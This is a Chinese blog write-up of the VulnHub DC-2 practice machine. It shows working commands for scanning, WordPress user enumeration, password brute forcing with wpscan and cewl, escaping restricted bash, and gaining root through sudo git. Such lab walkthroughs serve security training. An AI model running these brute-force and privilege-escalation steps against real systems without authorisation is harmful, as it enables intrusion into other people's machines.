DC2靶机渗透

已于 2023-08-04 17:16:59 修改
阅读量165 收藏 1
点赞数 1
文章标签: 安全
于 2023-08-04 17:09:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q1234syr_/article/details/132097907
版权

DC2靶机渗透

今天我们来学习D2靶机渗透找出所有flag

开始进行靶机下载地址:
链接: https://www.vulnhub.com/entry/dc-2,311/
在靶机下载后,将模式改为NAT模式,重启靶机

第一步:靶机信息收集

// nmap查询存活主机
nmap -sP 192.168.109.0/24

发现靶机IP

查看开放端口

// nmap查询查询开放端口
nmap -sV -p- 192.168.109.136

在这里插入图片描述
打开网页,发现页面无法访问
在这里插入图片描述

第二步:查找flag1

尝试修改/etc/host 配置(kali设置)
在这里插入图片描述
尝试修改C:\Windows\System32\drivers\etc\hosts(windows设置)
在这里插入图片描述
成功访问页面,然后开启点点点,查找flag
在这里插入图片描述发现flag1
在这里插入图片描述

第三步:查找flag2(wpscan暴力破解)

嗯。。。给了个提示cewl (和字典有关,应该要破解密码用)先不管,还有用户名的提示,发现cms是wordpress 用wpscan扫描一下网页列出站点的用户名、账号

在这里插入图片描述

// wpscan扫描用户名
wpscan --url  dc-2 -e u

不理解wpscan放入小伙伴参考大佬写的链接
链接: https://zhuanlan.zhihu.com/p/149725645

–url|-u 要扫描的’WordPress站点
–enumerate | -e [option(s)] 枚举
u 枚举用户名(默认10个)
简单罗列出三个用户名和相关信息
在这里插入图片描述
将用户名写入user.txt文件,方便后续破解密码

根据flag1给的提示cewl生成字典dict.txt

// cewl生成dict.txt字典
cewl dc-2 -w dict.txt

cewl全指南命令链接如下
链接: https://www.freebuf.com/articles/network/190128.html
字典有了,用户名有了,开始破解密码

// wpscan暴力破解
 wpscan --url dc-2 -U user.txt -P dict.txt

-U:用户名文件
-P:字典文件
(有路径的要写上路径)
破解成功
在这里插入图片描述
去网页找找登录框。我喜欢用御剑,小伙伴们自行选择
在这里插入图片描述登录成功,点点点,发现flag2
在这里插入图片描述

第四步:查找flag3


根据提示还有另一种方法
嗯。。。记得之前扫描端口时候开通了ssh 现在有用户名密码,试试看可不可登录呢。。

在这里插入图片描述

// ssh 连接(加端口号)
ssh tom@192.168.109.136 -p 7744

成功用tom用户进入
在这里插入图片描述
成功发现flag3,用vi编辑打开查看

第五步:查找flag4(绕过rbash)

翻译过来意思好像是回到jerry用户上, 又看到有su提示尝试切换到jerry
在这里插入图片描述
看来需要绕过rbash,设置shell变量

// 绕过rbash
tom@DC-2:~$ whoami
-rbash: whoami: command not found
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ ls
flag3.txt   usr
tom@DC-2:~$ cat flag3.txt

发现flag3可以用cat命令查看了
在试着切换到jerry用户下

// An highlighted block
tom@DC-2:~$ su jerry
Password: 
jerry@DC-2:/home/tom$ cd /home/jerry
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt

发现flag4
在这里插入图片描述

第五步:查找最终flag(git提权)

提示git 想到是否为git提权 root用户查询最终flag呢

// git提权
jerry@DC-2:~$ sudo git -p help config
:!/bin/sh

提权成功,查找最终flag

// 
# whoami
root
# ls
flag4.txt
# ls /root
final-flag.txt
# cat /root/final-flag.txt

获得最终的flag

完结 撒花✿✿ヽ(°▽°)ノ✿

q1234syr_
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DC2-靶机
Au
08-19 1751
下载地址 我配置的环境: kali:192.168.25.131 DC2 -靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机 192.168.25.128,判定为DC2-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.1...
靶机渗透——DC-2
Lorezon的博客
04-14 292
扫描靶机IP nmap一波
渗透测试靶机:DC-2
my的博客
11-21 112
7744端口(ssh):使用hydra通过密码字典爆破ssh登录密码。切换root用户,在root目录下找到final-flag.txt。发现只能使用less、ls、scp、vi命令,无法su切换用户。切换Jerry用户家目录,发现flag4提示使用git提权。wpscan爆破用户密码,找到Jerry和tom的密码。flag2提示换一个切入点,80端口切入失败,80、7744端口开放,修改了ssh默认端口。ls发现flag3.txt,su提示切换用户。重新访问网站,下方找到flag1。
对DC-2靶机进行渗透测试
zll___的博客
03-11 788
对DC-2靶机进行渗透测试
DC-2靶机实操获flag
weixin_47041685的博客
02-05 1756
一:本次的靶机渗透是一个找寻DC-2靶机中的flag的过程,以最终的flag为目标。 二:使用工具:kali,DC-2靶机 三:涉及到的内容:nmap,netdiscover的用;编辑/etc/hosts文件,添加靶机IP地址及对应域名;nikto工具扫描网站结构,找到wp-login.php登录页面;wpscan工具扫描网站,获取可以登录网站的用户名;cewl生成密码字典;wpscan工具爆破可以登录用户的密码;hydra工具使用已生成的密码字典对已知的用户名进行ssh登录密码爆破,获得ssh登录用户;用
DC-2渗透靶机详解
weixin_51083551的博客
07-25 1684
萌新DC系列靶机渗透详解之DC-2 DC-1 结束之后开始 DC-2 的内容 1. 明确目标 目标肯定还是不变的嘛,还是找齐里面所有的 flag 根据每个 flag 的提示找到下一个 flag 2. 信息收集 靶机是在同一个网段下使用的 还是 arp-scan 扫描即可 └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:f2:1a:d5, IPv4: 192.168.0.111 Starting arp-scan 1.9.7 with
【VulnHub靶机渗透】六:DC-2
野原新之助
04-25 663
靶机设定线索引导用户得到相关信息,存在弱口令和sudo权限配置不当等安全问题。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3649
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
DC2靶机练习
LSYZWF的博客
04-22 303
实验环境:DC-2靶机,kali linux攻击机,win10辅助机 靶机: 链接:https://pan.baidu.com/s/1naWHuZDDwWOI2zqO6vG6OA 提取码:rkzw 1、kali主机扫描内网存活主机 查询kali主机的ip地址:192.168.246.130 创建DC2专用文件夹 开始扫描 继续具体扫描目标主机 开放的端口 目标系统开放了80端口与7744端口 开放了80端口,用浏览器访问ip地址,发现网页打不开,但是网址重定向为http://dc-2 所以需要在物
dc-6靶机渗透笔记
现代鲁滨逊的博客
05-12 197
1.主机发现192.168.174.157 2.nmap扫描 3.访问主站,在那之前和DC2一样,先在/etc/hosts文件加上靶机IP与域名的对应关系,站点看起来和dc2好像有点像,仅凭一点点记忆看看能不能自己攻下 4.用wpscan扫一扫,爆出来用户名 wpscan--url http://wordy/--enumerateu 5. 好的,准备搞一手弱口令爆破。事实是爆破了几个小时都还没出结果,折磨人,难道是姿势不对??应该是字典不够强大。一顿乱搞之后,我还是去翻了翻别...
【精选】文件摆渡系统:跨网文件传输的安全与效率之选
文件数据安全交换
09-06 889
同时满足安全与效率兼顾的文件摆渡系统,那就是Ftrans飞驰云联的《Ftrans Ferry跨网文件安全交换系统》,这是一款由飞驰云联自主研发的安全产品,可以有效解决内外网间、多个网络之间、HPC环境下、云租户之间的跨网文件摆渡需求,通过多审核审批、日志审计、防病毒、DLP检测、传输加密、权限管控、传输加速等,实现统一的文件摆渡安全管控,提高网间数据交互效率。支持企业微信、钉钉等进行消息通知集成。系统内置DLP检测功能,可检测文件的大小、文件名、文件个数、文件来源、敏感内容、文件类型、是否含有病毒等。
网络安全售前入门09安全服务——安全加固服务
打工人
09-02 1311
安全加固服务是参照风险评估、等保测评、安全检查等工作的结果,基于科学的安全思维方式、长期的安全服务经验积累、对行业的深刻理解、处理安全事件的最佳实践,为客户提供完善的安全加固方案,并在客户侧反馈完成加固后,提供二次评估服务,从而帮助客户达到修补信息系统脆弱性,提高系统安全性,满足相关政策法规的目的。
剖析Cookie的工作原理及其安全风险
最新发布
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
09-06 861
Cookie,也称为HTTP cookie、web cookie、互联网cookie或浏览器cookie,是一种用于在用户浏览网站时识别用户并为其准备网页的小型数据片段。它允许Web服务器跟踪用户的浏览历史并响应之前披露的偏好。可以增强用户体验,并基于过去的行为启用个性化内容。Cookie通常以键值对的形式存储在用户的硬盘上,是一个二进制的Sqlite文件,Windows系统中Chrome浏览器的Cookie默认位置一般为。Cookie有多种类型,包括会话cookie和持久cookie。
一次性解决 | 网站被提示“不安全
liushuai66888的博客
09-06 337
部署SSL证书:如果网站尚未部署SSL证书,需要购买或获取一个由权威证书颁发机构(CA)签发的SSL证书,并安装在服务器上。安装证书后,网站就是经过第三方CA验证过的,浏览器就会信任这类网站,也就不会在提示“不安全”。通过以上步骤,可以一次性解决网站被提示“不安全”的问题,提升网站的安全性,保护用户数据,并增强网站的品牌形象和用户信任度。如果自己不熟悉SSL证书的安装和配置,或者遇到难以解决的问题,建议联系专业的技术支持人员或网络安全专家来帮助解决。检查证书链:确保证书链完整,没有缺少必要的中间证书。
思科交换机端口安全配置1
2302_76730689的博客
09-02 1013
2配置交换机B的主机名称,创建vlan 10和vlan 20,将f0/1、2划入vlan 10,f0/3、4划入vlan 20,将f0/24配置为Trunk。#3配置交换机A的主机名称,创建vlan 10和vlan 20,并vlan 10和vlan 20 的SVI接口配置IP地址,并启用交换机的路由功能。#4在Switch-B上针对不同vlan 的主机配置端口安全
API安全 | 发现API的5个小tips
2301_80115097的博客
09-05 635
安全测试目标时,最有趣的测试部分是它的 API。API 是动态的,它们比应用程序的其他部分更新得更频繁,并且负责许多后端繁重的工作。在现代应用程序中,我们通常会看到 REST API,但也会看到其他形式,例如 GraphQL 甚至 SOAP。
AWS EC2安全组配置:轻松开放端口访问
九河云的创作之路
09-03 610
选择要开放的协议类型(如TCP、UDP等),输入端口号,然后在来源处选择允许访问的IP范围。通过以上步骤,您可以轻松管理EC2实例的端口访问,既保证了服务的可用性。记住,定期检查和更新安全组配置是保持EC2实例安全的关键。点击左侧导航栏中的"安全组",找到对应实例的安全组。选择该安全组,点击"编辑入站规则"。在AWS EC2实例上开放特定端口是配置服务器安全性和可访问性的重要步骤。在EC2控制面板中,找到需要开放端口的实例,并记下其安全组ID。添加完所需的规则后,点击"保存规则"以应用更改。
【软件逆向】第31课,软件逆向安全工程师之(六)基址变址寻址,每天5分钟学习逆向吧!
DvlpNews
09-02 568
基址变址寻址(Base-Indexed Addressing)是x86汇编语言中的一种寻址模式,它允许程序员通过结合基址寄存器、索引寄存器和偏移量来访问内存中的数据。这种寻址模式特别适用于处理数组和结构体等数据结构。
【网络安全】CSRF漏洞—CSRF基础漏洞防御
goldfish8848的博客
09-01 998
跨站点的请求请求是伪造的(假装可信)Cross-Site Request Forgery,跨站请求伪造。它是一种挟持用户在当前已登陆的Web应用程序上执行非本意的操作的攻击方法。同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源。所以xyz.com下的js脚本采用ajax读取abc.com里面的文件数据会被拒绝同源策略限制了从同一个源加载的文档或脚本如何与来自另一个源的资源进行交互。这是一个用于隔离潜在恶意文件的重要安全机制。
cbm-dc2 超声波程序
10-14
CBM-DC2超声波程序是一种基于超声波技术的测量程序。CBM是嵌入式系统名称,DC2则表示第二代设备。该程序主要应用于测量距离、检测物体的位置、识别物体的形状等方面。 CBM-DC2超声波程序的工作原理是通过超声波发射器发射超声波信号,然后接收器接收到被物体反射后的声波信号。通过计算发射与接收之间的时间差,并结合声速的知识,可以准确地测量出被测物体与传感器之间的距离。这种测量方法具有非接触、快速、准确等优点,因此广泛应用于各个领域。 CBM-DC2超声波程序可以用于测量物体的距离。通过将传感器安装在测量物体附近,即可实时测量物体与传感器之间的距离。比如在机械领域中,可以用来检测机械设备中零件的位置和间距,以及机器人中的障碍物位置,可广泛应用于自动化生产线中。 此外,CBM-DC2超声波程序还可以用于检测物体的位置。通过分析声波信号的强弱或回波的时间差,可以确定物体在空间中的位置。这在自动驾驶领域中具有重要意义,可以用于检测周围车辆、行人或其他障碍物的位置和距离,以保证交通安全。 最后,CBM-DC2超声波程序还能用于识别物体的形状。通过分析声波信号的回波,可以获得物体的轮廓和形状信息。这在制造业中具有广泛的应用,可以用于产品检测、零件测量等,以提高生产效率和质量管理水平。 总之,CBM-DC2超声波程序是一种基于超声波技术的测量程序,可以应用于测量距离、检测物体位置和识别物体形状等多个领域,具有非接触、快速、准确等优点,在各个领域中发挥着重要作用。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值